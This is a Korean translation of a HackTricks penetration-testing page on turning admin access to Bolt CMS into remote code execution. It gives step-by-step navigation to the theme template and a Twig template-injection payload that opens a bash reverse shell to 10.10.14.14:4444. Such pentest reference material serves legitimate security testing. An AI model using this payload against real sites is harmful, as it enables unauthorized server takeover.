Mirrors/hacktricks

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00

Translator workflow 1d9d380da0 Translated to Korean

2024-02-10 21:30:13 +00:00

3.3 KiB

Raw Blame History

Bolt CMS

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 스웨그를 얻으세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm을 팔로우하세요.
HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 여러분의 해킹 기교를 공유하세요.

RCE

관리자로 로그인한 후 (로그인 프롬프트에 액세스하려면 /bot로 이동), Bolt CMS에서 RCE를 얻을 수 있습니다:

Configuration -> View Configuration -> Main Configuration을 선택하거나 URL 경로 /bolt/file-edit/config?file=/bolt/config.yaml로 이동합니다.
theme의 값을 확인하세요.

File management -> View & edit templates를 선택합니다.
이전 단계에서 찾은 테마 베이스 (이 경우에는 base-2021)를 선택하고 index.twig를 선택합니다.
제 경우에는 URL 경로 /bolt/file-edit/themes?file=/base-2021/index.twig에 있습니다.
템플릿 인젝션 (Twig)을 통해 이 파일에 페이로드를 설정하세요. 예: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
그리고 변경 사항을 저장하세요.

Maintenance -> Clear the cache에서 캐시를 지웁니다.
일반 사용자로 다시 페이지에 액세스하면 페이로드가 실행됩니다.

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 스웨그를 얻으세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm을 팔로우하세요.
HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 여러분의 해킹 기교를 공유하세요.